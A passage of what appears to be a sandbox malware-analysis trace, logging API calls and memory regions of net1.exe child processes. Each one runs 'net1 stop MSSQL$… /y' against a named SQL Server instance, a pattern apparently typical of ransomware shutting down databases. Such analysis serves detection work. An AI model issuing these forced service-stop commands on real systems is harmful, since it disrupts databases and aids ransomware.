_String2="MSSQL$ECWDB2") returned -14 [0103.538] _wcsicmp (_String1="receiver", _String2="MSSQL$ECWDB2") returned 5 [0103.538] _wcsicmp (_String1="rcv", _String2="MSSQL$ECWDB2") returned 5 [0103.538] _wcsicmp (_String1="netpopup", _String2="MSSQL$ECWDB2") returned 1 [0103.538] _wcsicmp (_String1="redirector", _String2="MSSQL$ECWDB2") returned 5 [0103.538] _wcsicmp (_String1="redir", _String2="MSSQL$ECWDB2") returned 5 [0103.538] _wcsicmp (_String1="rdr", _String2="MSSQL$ECWDB2") returned 5 [0103.538] _wcsicmp (_String1="workstation", _String2="MSSQL$ECWDB2") returned 10 [0103.538] _wcsicmp (_String1="work", _String2="MSSQL$ECWDB2") returned 10 [0103.538] _wcsicmp (_String1="wksta", _String2="MSSQL$ECWDB2") returned 10 [0103.538] _wcsicmp (_String1="prdr", _String2="MSSQL$ECWDB2") returned 3 [0103.538] _wcsicmp (_String1="devrdr", _String2="MSSQL$ECWDB2") returned -9 [0103.538] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$ECWDB2") returned -1 [0103.538] _wcsicmp (_String1="server", _String2="MSSQL$ECWDB2") returned 6 [0103.538] _wcsicmp (_String1="svr", _String2="MSSQL$ECWDB2") returned 6 [0103.538] _wcsicmp (_String1="srv", _String2="MSSQL$ECWDB2") returned 6 [0103.538] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$ECWDB2") returned -1 [0103.538] _wcsicmp (_String1="alerter", _String2="MSSQL$ECWDB2") returned -12 [0103.538] _wcsicmp (_String1="netlogon", _String2="MSSQL$ECWDB2") returned 1 [0103.538] _wcsupr (in: _String="MSSQL$ECWDB2" | out: _String="MSSQL$ECWDB2") returned="MSSQL$ECWDB2" [0103.539] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3bce10 [0103.542] GetServiceKeyNameW (in: hSCManager=0x3bce10, lpDisplayName="MSSQL$ECWDB2", lpServiceName=0xff995750, lpcchBuffer=0x26fb48 | out: lpServiceName="", lpcchBuffer=0x26fb48) returned 0 [0103.543] _wcsicmp (_String1="msg", _String2="MSSQL$ECWDB2") returned -12 [0103.543] _wcsicmp (_String1="messenger", _String2="MSSQL$ECWDB2") returned -14 [0103.544] _wcsicmp (_String1="receiver", _String2="MSSQL$ECWDB2") returned 5 [0103.544] _wcsicmp (_String1="rcv", _String2="MSSQL$ECWDB2") returned 5 [0103.544] _wcsicmp (_String1="redirector", _String2="MSSQL$ECWDB2") returned 5 [0103.544] _wcsicmp (_String1="redir", _String2="MSSQL$ECWDB2") returned 5 [0103.544] _wcsicmp (_String1="rdr", _String2="MSSQL$ECWDB2") returned 5 [0103.544] _wcsicmp (_String1="workstation", _String2="MSSQL$ECWDB2") returned 10 [0103.544] _wcsicmp (_String1="work", _String2="MSSQL$ECWDB2") returned 10 [0103.544] _wcsicmp (_String1="wksta", _String2="MSSQL$ECWDB2") returned 10 [0103.544] _wcsicmp (_String1="prdr", _String2="MSSQL$ECWDB2") returned 3 [0103.544] _wcsicmp (_String1="devrdr", _String2="MSSQL$ECWDB2") returned -9 [0103.544] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$ECWDB2") returned -1 [0103.544] _wcsicmp (_String1="server", _String2="MSSQL$ECWDB2") returned 6 [0103.544] _wcsicmp (_String1="svr", _String2="MSSQL$ECWDB2") returned 6 [0103.544] _wcsicmp (_String1="srv", _String2="MSSQL$ECWDB2") returned 6 [0103.544] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$ECWDB2") returned -1 [0103.544] _wcsicmp (_String1="alerter", _String2="MSSQL$ECWDB2") returned -12 [0103.544] _wcsicmp (_String1="netlogon", _String2="MSSQL$ECWDB2") returned 1 [0103.544] NetServiceControl (in: servername=0x0, service="MSSQL$ECWDB2", opcode=0x0, arg=0x0, bufptr=0x26fb50 | out: bufptr=0x26fb50) returned 0x889 [0103.545] wcscpy_s (in: _Destination=0xff9980d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0103.545] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0103.546] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0103.547] GetFileType (hFile=0xb) returned 0x2 [0103.547] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa18 | out: lpMode=0x26fa18) returned 1 [0103.547] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x26fa10, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0x26fa10*=0x1e) returned 1 [0103.548] GetFileType (hFile=0xb) returned 0x2 [0103.548] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa18 | out: lpMode=0x26fa18) returned 1 [0103.548] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fa10, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0x26fa10*=0x2) returned 1 [0103.548] _ultow (in: _Dest=0x889, _Radix=2554496 | out: _Dest=0x889) returned="2185" [0103.548] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0103.549] GetFileType (hFile=0xb) returned 0x2 [0103.549] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa18 | out: lpMode=0x26fa18) returned 1 [0103.549] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x26fa10, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0x26fa10*=0x34) returned 1 [0103.549] GetFileType (hFile=0xb) returned 0x2 [0103.550] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x26fa18 | out: lpMode=0x26fa18) returned 1 [0103.550] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x26fa10, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0x26fa10*=0x2) returned 1 [0103.550] NetApiBufferFree (Buffer=0x3b4d50) returned 0x0 [0103.550] NetApiBufferFree (Buffer=0x3bc100) returned 0x0 [0103.550] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$ECWDB2 /y" [0103.550] exit (_Code=2) Process: id = "188" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5b0f3000" os_pid = "0x510" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "180" os_parent_pid = "0xb34" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$PROFXENGAGEMENT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7617 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7618 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7619 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7620 start_va = 0x210000 end_va = 0x28ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 7621 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7622 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 7623 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 7624 start_va = 0xff970000 end_va = 0xff9a2fff entry_point = 0xff970000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 7625 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7626 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 7627 start_va = 0x7fffffd8000 end_va = 0x7fffffd8fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 7628 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 7629 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 7630 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7631 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7697 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7698 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 7699 start_va = 0x160000 end_va = 0x1c6fff entry_point = 0x160000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7700 start_va = 0x290000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 7701 start_va = 0x470000 end_va = 0x47ffff entry_point = 0x0 region_type = private name = "private_0x0000000000470000" filename = "" Region: id = 7702 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 7703 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 7704 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 7705 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 7706 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 7707 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 7708 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 7709 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 7710 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 7711 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7712 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 7713 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 7714 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7715 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7716 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7717 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7718 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7719 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7745 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 632 os_tid = 0x6e0 [0103.477] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fc70 | out: lpSystemTimeAsFileTime=0x28fc70*(dwLowDateTime=0xf2d98450, dwHighDateTime=0x1d48689)) [0103.477] GetCurrentProcessId () returned 0x510 [0103.477] GetCurrentThreadId () returned 0x6e0 [0103.477] GetTickCount () returned 0x23a22 [0103.478] QueryPerformanceCounter (in: lpPerformanceCount=0x28fc78 | out: lpPerformanceCount=0x28fc78*=1815039600000) returned 1 [0103.479] GetModuleHandleW (lpModuleName=0x0) returned 0xff970000 [0103.479] __set_app_type (_Type=0x1) [0103.479] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff989c9c) returned 0x0 [0103.479] __getmainargs (in: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788, _DoWildCard=0, _StartInfo=0xff99479c | out: _Argc=0xff994780, _Argv=0xff994790, _Env=0xff994788) returned 0 [0103.479] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0103.480] GetConsoleOutputCP () returned 0x1b5 [0103.489] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff99cec0 | out: lpCPInfo=0xff99cec0) returned 1 [0103.489] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0103.494] sprintf_s (in: _DstBuf=0x28fc18, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0103.495] setlocale (category=0, locale=".437") returned="English_United States.437" [0103.507] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0103.507] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0103.507] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PROFXENGAGEMENT /y" [0103.507] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f9b0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0103.507] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0103.507] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fc08 | out: Buffer=0x28fc08*=0x74d60) returned 0x0 [0103.507] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x28fc08 | out: Buffer=0x28fc08*=0x7c130) returned 0x0 [0103.507] _fileno (_File=0x7fefdba2a80) returned 0 [0103.507] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0103.508] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0103.508] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0103.508] _wcsicmp (_String1="config", _String2="stop") returned -16 [0103.508] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0103.508] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0103.508] _wcsicmp (_String1="file", _String2="stop") returned -13 [0103.508] _wcsicmp (_String1="files", _String2="stop") returned -13 [0103.508] _wcsicmp (_String1="group", _String2="stop") returned -12 [0103.508] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0103.508] _wcsicmp (_String1="help", _String2="stop") returned -11 [0103.508] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0103.508] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0103.508] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0103.508] _wcsicmp (_String1="session", _String2="stop") returned -15 [0103.508] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0103.508] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0103.508] _wcsicmp (_String1="share", _String2="stop") returned -12 [0103.509] _wcsicmp (_String1="start", _String2="stop") returned -14 [0103.509] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0103.509] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0103.509] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0103.509] _wcsicmp (_String1="accounts", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0103.509] _wcsicmp (_String1="computer", _String2="MSSQL$PROFXENGAGEMENT") returned -10 [0103.509] _wcsicmp (_String1="config", _String2="MSSQL$PROFXENGAGEMENT") returned -10 [0103.509] _wcsicmp (_String1="continue", _String2="MSSQL$PROFXENGAGEMENT") returned -10 [0103.509] _wcsicmp (_String1="cont", _String2="MSSQL$PROFXENGAGEMENT") returned -10 [0103.509] _wcsicmp (_String1="file", _String2="MSSQL$PROFXENGAGEMENT") returned -7 [0103.509] _wcsicmp (_String1="files", _String2="MSSQL$PROFXENGAGEMENT") returned -7 [0103.509] _wcsicmp (_String1="group", _String2="MSSQL$PROFXENGAGEMENT") returned -6 [0103.509] _wcsicmp (_String1="groups", _String2="MSSQL$PROFXENGAGEMENT") returned -6 [0103.509] _wcsicmp (_String1="help", _String2="MSSQL$PROFXENGAGEMENT") returned -5 [0103.509] _wcsicmp (_String1="helpmsg", _String2="MSSQL$PROFXENGAGEMENT") returned -5 [0103.509] _wcsicmp (_String1="localgroup", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0103.509] _wcsicmp (_String1="pause", _String2="MSSQL$PROFXENGAGEMENT") returned 3 [0103.509] _wcsicmp (_String1="session", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.509] _wcsicmp (_String1="sessions", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.509] _wcsicmp (_String1="sess", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.509] _wcsicmp (_String1="share", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.509] _wcsicmp (_String1="start", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.509] _wcsicmp (_String1="stats", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.509] _wcsicmp (_String1="statistics", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.509] _wcsicmp (_String1="stop", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.509] _wcsicmp (_String1="time", _String2="MSSQL$PROFXENGAGEMENT") returned 7 [0103.510] _wcsicmp (_String1="user", _String2="MSSQL$PROFXENGAGEMENT") returned 8 [0103.510] _wcsicmp (_String1="users", _String2="MSSQL$PROFXENGAGEMENT") returned 8 [0103.510] _wcsicmp (_String1="msg", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0103.510] _wcsicmp (_String1="messenger", _String2="MSSQL$PROFXENGAGEMENT") returned -14 [0103.510] _wcsicmp (_String1="receiver", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.510] _wcsicmp (_String1="rcv", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.510] _wcsicmp (_String1="netpopup", _String2="MSSQL$PROFXENGAGEMENT") returned 1 [0103.510] _wcsicmp (_String1="redirector", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.510] _wcsicmp (_String1="redir", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.510] _wcsicmp (_String1="rdr", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.510] _wcsicmp (_String1="workstation", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0103.510] _wcsicmp (_String1="work", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0103.510] _wcsicmp (_String1="wksta", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0103.510] _wcsicmp (_String1="prdr", _String2="MSSQL$PROFXENGAGEMENT") returned 3 [0103.510] _wcsicmp (_String1="devrdr", _String2="MSSQL$PROFXENGAGEMENT") returned -9 [0103.510] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0103.592] _wcsicmp (_String1="server", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.592] _wcsicmp (_String1="svr", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.592] _wcsicmp (_String1="srv", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.592] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0103.593] _wcsicmp (_String1="alerter", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0103.593] _wcsicmp (_String1="netlogon", _String2="MSSQL$PROFXENGAGEMENT") returned 1 [0103.593] _wcsupr (in: _String="MSSQL$PROFXENGAGEMENT" | out: _String="MSSQL$PROFXENGAGEMENT") returned="MSSQL$PROFXENGAGEMENT" [0103.593] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7ce40 [0103.597] GetServiceKeyNameW (in: hSCManager=0x7ce40, lpDisplayName="MSSQL$PROFXENGAGEMENT", lpServiceName=0xff995750, lpcchBuffer=0x28fb28 | out: lpServiceName="", lpcchBuffer=0x28fb28) returned 0 [0103.598] _wcsicmp (_String1="msg", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0103.598] _wcsicmp (_String1="messenger", _String2="MSSQL$PROFXENGAGEMENT") returned -14 [0103.598] _wcsicmp (_String1="receiver", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.598] _wcsicmp (_String1="rcv", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.598] _wcsicmp (_String1="redirector", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.598] _wcsicmp (_String1="redir", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.598] _wcsicmp (_String1="rdr", _String2="MSSQL$PROFXENGAGEMENT") returned 5 [0103.598] _wcsicmp (_String1="workstation", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0103.599] _wcsicmp (_String1="work", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0103.599] _wcsicmp (_String1="wksta", _String2="MSSQL$PROFXENGAGEMENT") returned 10 [0103.599] _wcsicmp (_String1="prdr", _String2="MSSQL$PROFXENGAGEMENT") returned 3 [0103.599] _wcsicmp (_String1="devrdr", _String2="MSSQL$PROFXENGAGEMENT") returned -9 [0103.599] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0103.599] _wcsicmp (_String1="server", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.599] _wcsicmp (_String1="svr", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.599] _wcsicmp (_String1="srv", _String2="MSSQL$PROFXENGAGEMENT") returned 6 [0103.599] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$PROFXENGAGEMENT") returned -1 [0103.599] _wcsicmp (_String1="alerter", _String2="MSSQL$PROFXENGAGEMENT") returned -12 [0103.599] _wcsicmp (_String1="netlogon", _String2="MSSQL$PROFXENGAGEMENT") returned 1 [0103.599] NetServiceControl (in: servername=0x0, service="MSSQL$PROFXENGAGEMENT", opcode=0x0, arg=0x0, bufptr=0x28fb30 | out: bufptr=0x28fb30) returned 0x889 [0103.600] wcscpy_s (in: _Destination=0xff9980d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0103.600] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75280000 [0103.601] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75280000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0103.602] GetFileType (hFile=0xb) returned 0x2 [0103.603] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f9f8 | out: lpMode=0x28f9f8) returned 1 [0103.603] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x28f9f0, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0x28f9f0*=0x1e) returned 1 [0103.603] GetFileType (hFile=0xb) returned 0x2 [0103.603] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f9f8 | out: lpMode=0x28f9f8) returned 1 [0103.604] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f9f0, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0x28f9f0*=0x2) returned 1 [0103.604] _ultow (in: _Dest=0x889, _Radix=2685536 | out: _Dest=0x889) returned="2185" [0103.604] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75280000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff995b50, nSize=0x800, Arguments=0xff997f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0103.604] GetFileType (hFile=0xb) returned 0x2 [0103.604] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f9f8 | out: lpMode=0x28f9f8) returned 1 [0103.605] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff995b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x28f9f0, lpReserved=0x0 | out: lpBuffer=0xff995b50*, lpNumberOfCharsWritten=0x28f9f0*=0x34) returned 1 [0103.605] GetFileType (hFile=0xb) returned 0x2 [0103.605] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x28f9f8 | out: lpMode=0x28f9f8) returned 1 [0103.605] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff971efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x28f9f0, lpReserved=0x0 | out: lpBuffer=0xff971efc*, lpNumberOfCharsWritten=0x28f9f0*=0x2) returned 1 [0103.606] NetApiBufferFree (Buffer=0x74d60) returned 0x0 [0103.606] NetApiBufferFree (Buffer=0x7c130) returned 0x0 [0103.606] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$PROFXENGAGEMENT /y" [0103.606] exit (_Code=2) Process: id = "189" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x58934000" os_pid = "0x1348" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "182" os_parent_pid = "0x51c" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQL$SBSMONITORING /y" cur_dir = 